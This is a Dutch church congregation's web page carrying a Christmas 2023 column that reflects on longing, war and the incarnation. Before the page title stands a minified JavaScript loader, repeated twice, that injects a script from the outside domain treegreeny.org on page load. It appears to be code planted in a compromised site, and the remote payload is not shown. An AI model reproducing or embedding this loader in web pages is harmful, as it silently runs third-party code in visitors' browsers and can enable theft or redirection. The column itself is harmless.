;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gezegend Kerstfeest en een voorspoedig 2024! - PKN Damwâld

Gezegend Kerstfeest en een voorspoedig 2024!

Gepubliceerd op: woensdag 20 december 2023

Er zijn nauwelijks vieringen die onze menselijke hart en brein op dezelfde manier aanspreekt als Kerstmis. Alle verlangens lijken vooral in deze tijd samen te komen en zich uit te drukken. Onze oerverlangens zijn met Kerstmis merkbaar: het verlangen naar vrede, naar harmonie, geborgenheid, gezondheid, geluk en ook het verlangen naar de eeuwigheid.

Het is goed om Kerstmis te vieren in deze donkere tijd. Net zoals kaarsen een warm licht in onze huiskamers brengen, willen veel goede gedachten over Kerstmis een warm licht in ons hart laten schijnen. Sommigen herinneren zich misschien fijne kerstdagen met hun ouders, broers en zussen. In de geest van iemand anders kunnen de bekende melodieën en warme woorden van oude kerstliederen mooie herinneringen oproepen. Sommigen zijn misschien ontroerd als ze opnieuw het bekende verhaal horen van de herders die geraakt werden door de geboorte van Jezus in de stal in Bethlehem. Zulke goede gedachten over Kerstmis kunnen ervoor zorgen dat we ons allemaal gelukkig voelen in ons hart. Kerstmis zal dus voor ons gezegend zijn.

Kerstboom en kaarslicht, lekker eten, sfeer, kerstliederen en kerstmarkt – zo houden wij van de adventstijd en het hoogtepunt is kerstavond. Ik kijk ook elk jaar uit naar deze tijd van verlangen. Maar onze wereld past niet meer in deze tijd: de oorlog in Oekraïne, geweld in de Gazastrook, onrust in de wereld en toenemende verruwing en verhuftering van onze samenleving hebben dit jaar bepaald en bovendien lijkt ons land in allerlei opzichten steeds meer verdeeld te raken. Ja, wat kan ons nog echt schokken?

Hoe zit het nu met kerst? Is het allemaal maar mooie schijn? Een aantal van onze gebruiken misschien. Maar de echte kerst is juist een feest voor deze tijd. Omdat het meer is dan commercie, kerstdiners, overpeinzing en kaarslicht. De kerkelijke advents- en kerstliederen hebben een andere boodschap. De tijd van wachten is nu voorbij, kerst wordt gevierd. Een nieuwe tijd is aangebroken!

Kerstmis betekent: God komt regelrecht in deze donkere wereld. Hij komt in ons midden, onopgemerkt door de meeste mensen. Als klein kind doorbreekt Hij de cyclus van geweld. God komt zelfs als wij het niet geloven. Hij is er, ook al voelen wij het niet. De wereld hoeft niet te blijven zoals ze is: dat is de boodschap van Kerstmis.

Met Kerstmis vieren we dat God mens werd. God ziet niet alleen hoe het met ons gaat, Hij heeft het ook ervaren. Dat had hij zichzelf kunnen besparen, maar Hij wilde bij ons zijn. Zijn blik is er één vol hoop, liefde en begrip. Zo bezien kun je het nieuwe jaar vrolijk en gezegend beginnen.

Columnist:Kees

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns